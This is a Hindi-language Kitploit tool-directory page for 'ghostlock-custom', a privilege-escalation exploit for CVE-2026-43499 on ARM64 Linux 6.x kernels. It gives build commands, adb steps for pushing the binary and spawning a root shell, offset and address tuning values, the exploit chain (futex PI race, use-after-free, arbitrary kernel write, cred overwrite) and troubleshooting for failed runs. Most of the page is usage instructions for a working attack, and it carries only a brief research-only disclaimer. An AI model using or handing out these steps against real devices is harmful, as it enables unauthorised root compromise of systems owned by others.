Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ghostlock-custom — गैर-Android Linux 6.x ARM64 के लिए GhostLock (CVE-2026-43499) अनुकूलन | Kitploit
उपकरण/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

गैर-Android Linux 6.x ARM64 के लिए GhostLock (CVE-2026-43499) अनुकूलन

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
2 दिन पहलेअभी तक समीक्षित नहीं

GhostLock Custom — CVE-2026-43499 अनुकूलित संस्करण

गैर-Android Linux 6.x ARM64 कर्नेल के लिए GhostLock (CVE-2026-43499) विशेषाधिकार वृद्धि शोषण।

कर्नेल विशेषताएँ

आइटममान
आर्किटेक्चरARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
कर्नेल संस्करण6.x
SELinuxनहीं
ashmemनहीं
configfsनहीं

संकलन

स्थानीय संकलन (क्रॉस-कंपाइलर आवश्यक)

root@kitploit:~
make

Android NDK संकलन

root@kitploit:~
make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (क्लाउड संकलन)

पुश करने पर स्वचालित रूप से संकलन ट्रिगर होता है, बस आर्टिफैक्ट डाउनलोड करें।

उपयोग

root@kitploit:~
# लक्ष्य डिवाइस पर पुश करें
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# रूट शेल प्राप्त करें
adb shell /data/local/tmp/e --shell

# pselect ऑफसेट समायोजित करें (यदि डिफ़ॉल्ट मान काम नहीं करता है)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# भौतिक लोड पता निर्दिष्ट करें
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

पर्यावरण चर

विशेषाधिकार वृद्धि सिद्धांत

  1. futex PI रेस: FUTEX_CMP_REQUEUE_PI remove_waiter() का UAF ट्रिगर करता है
  2. pselect स्टैक ओवरराइट: मुक्त किया गया rt_mutex_waiter stack_fds बफर में आता है
  3. PI ट्री लेखन: निर्मित फेक waiter के माध्यम से कर्नेल एड्रेस पर मनमाना लेखन प्राप्त करें
  4. cred ओवरराइट: task_struct->cred को init_cred से ओवरराइट करें

अनुकूलन विवरण

यह संस्करण ghostlock-oneplus पर आधारित सरलीकृत है:

  • SELinux अक्षम करने वाला कोड हटाया गया (इस कर्नेल में SELinux नहीं है)
  • ashmem/configfs संबंधित कोड हटाया गया (इस कर्नेल में ये घटक नहीं हैं)
  • KernelSU इंस्टॉलेशन कोड हटाया गया
  • SLIDE KASLR लीक हटाया गया (कोई loggers/nfulnl_logger नहीं)
  • Android-विशिष्ट कोड हटाया गया (miniADB आदि)

समस्या निवारण

अस्वीकरण

यह उपकरण केवल सुरक्षा अनुसंधान के लिए है। उपयोगकर्ता को सभी जिम्मेदारी स्वयं वहन करनी होगी।

टूल डाउनलोड करें
चरडिफ़ॉल्ट मानविवरण
PSELECT_SHIFT-2स्टैक पर pselect waiter का ऑफसेट समायोजन
KPHYS0x80000000कर्नेल भौतिक लोड पता
KIMAGE_TEXT_BASE0xffffffc008000000कर्नेल वर्चुअल आधार पता
लक्षणसंभावित कारणसमाधान
डिवाइस रीबूटPSELECT_SHIFT गलत-4 से +4 तक एक-एक करके आज़माएँ
कोई प्रभाव नहींKPHYS गलत/proc/iomem में सही मान की पुष्टि करें
perf_event_open failedseccomp प्रतिबंधADB शेल के माध्यम से चलाने का प्रयास करें
रूट नहीं मिलाऑफसेट मेल नहीं खातेकर्नेल संस्करण की पुष्टि करें, TASK_CRED_OFF जाँचें